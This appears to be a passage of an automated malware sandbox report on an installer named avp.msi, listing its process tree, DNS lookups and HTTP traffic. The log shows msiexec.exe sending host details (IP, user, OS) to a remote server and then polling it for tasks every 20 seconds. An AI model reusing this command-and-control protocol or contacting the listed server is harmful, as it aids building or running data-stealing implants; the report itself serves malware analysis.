                                                  Apr 19, 2024 06:15:20.914247036 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:20.966355085 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:40.917332888 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:15:41.098145962 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:15:41.149534941 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:01.102780104 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:01.283288956 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:16:01.332891941 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:21.289035082 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:21.472333908 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:16:21.518510103 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:41.475526094 CEST4973180192.168.2.485.239.53.219
                                                  Apr 19, 2024 06:16:41.665159941 CEST804973185.239.53.219192.168.2.4
                                                  Apr 19, 2024 06:16:41.707437038 CEST4973180192.168.2.485.239.53.219
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 19, 2024 06:14:48.531476974 CEST6537653192.168.2.41.1.1.1
                                                  Apr 19, 2024 06:14:48.635924101 CEST53653761.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Apr 19, 2024 06:14:48.531476974 CEST192.168.2.41.1.1.10xa78bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Apr 19, 2024 06:14:48.635924101 CEST1.1.1.1192.168.2.40xa78bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                  Apr 19, 2024 06:14:48.635924101 CEST1.1.1.1192.168.2.40xa78bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                  Apr 19, 2024 06:14:48.635924101 CEST1.1.1.1192.168.2.40xa78bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                  • api.ipify.org
                                                  • *
                                                    • 85.239.53.219
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973185.239.53.219805088C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  Apr 19, 2024 06:15:00.345058918 CEST267OUTPOST /api/gateway HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 169
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:15:00.345058918 CEST169OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 76 31 2e 34 2e 30 22 2c 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 4a 4f 4e 45 53 2d 50 43 22 2c 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 38 33 38 37 35 22 2c 22 61
                                                  Data Ascii: {"version":"v1.4.0","ip":"81.181.57.52","domain":"user-PC","hostname":"783875","arch":"x86","os_version":"Windows 6.3.9600","cur_user":"Administrator","owner":"Nevada"}
                                                  Apr 19, 2024 06:15:00.548301935 CEST266INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:15:00 GMT
                                                  Content-Type: application/json; charset=utf-8
                                                  Content-Length: 74
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Data Raw: 7b 22 6b 65 79 22 3a 20 22 57 6b 5a 50 78 42 6f 48 36 43 41 33 4f 6b 34 69 49 22 2c 20 22 69 64 22 3a 20 22 37 66 38 34 31 65 61 33 2d 63 38 37 35 2d 36 64 66 64 2d 36 37 38 62 2d 32 39 64 63 37 39 34 30 31 34 63 31 22 7d
                                                  Data Ascii: {"key": "WkZPxBoH6CA3Ok4iI", "id": "7f841ea3-c875-6dfd-678b-29dc794014c1"}
                                                  Apr 19, 2024 06:15:00.550322056 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:15:00.730904102 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:15:00 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Apr 19, 2024 06:15:20.734085083 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:15:20.914247036 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:15:20 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Apr 19, 2024 06:15:40.917332888 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:15:41.098145962 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:15:41 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Apr 19, 2024 06:16:01.102780104 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:16:01.283288956 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:16:01 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Apr 19, 2024 06:16:21.289035082 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:16:21.472333908 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:16:21 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer
                                                  Apr 19, 2024 06:16:41.475526094 CEST300OUTPOST /api/7f841ea3-c875-6dfd-678b-29dc794014c1/tasks HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/json
                                                  Referer: */*
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Content-Length: 0
                                                  Host: 85.239.53.219
                                                  Apr 19, 2024 06:16:41.665159941 CEST185INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 19 Apr 2024 04:16:41 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 0
                                                  Connection: keep-alive
                                                  Referrer-Policy: no-referrer


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730104.26.12.2054435088C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-19 04:14:48 UTC188OUTGET / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                  Host: api.ipify.org
                                                  2024-04-19 04:14:49 UTC211INHTTP/1.1 200 OK
                                                  Date: Fri, 19 Apr 2024 04:14:49 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 12
                                                  Connection: close
                                                  Vary: Origin
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 876a11e4a90bb09f-ATL
                                                  2024-04-19 04:14:49 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                  Data Ascii: 81.181.57.52


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:06:14:42
                                                  Start date:19/04/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\avp.msi"
                                                  Imagebase:0x7ff735060000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:06:14:42
                                                  Start date:19/04/2024
                                                  Path:C:\Windows\System32\msiexec.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                  Imagebase:0x7ff735060000
                                                  File size:69'632 bytes
                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:06:14:42
                                                  Start date:19/04/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C10F74E54A153762865D83F4FD97627E C
                                                  Imagebase:0x170000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:06:14:43
                                                  Start date:19/04/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E8F250EF0BB0858F7D9FA6A616305218
                                                  Imagebase:0x170000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  No disassembly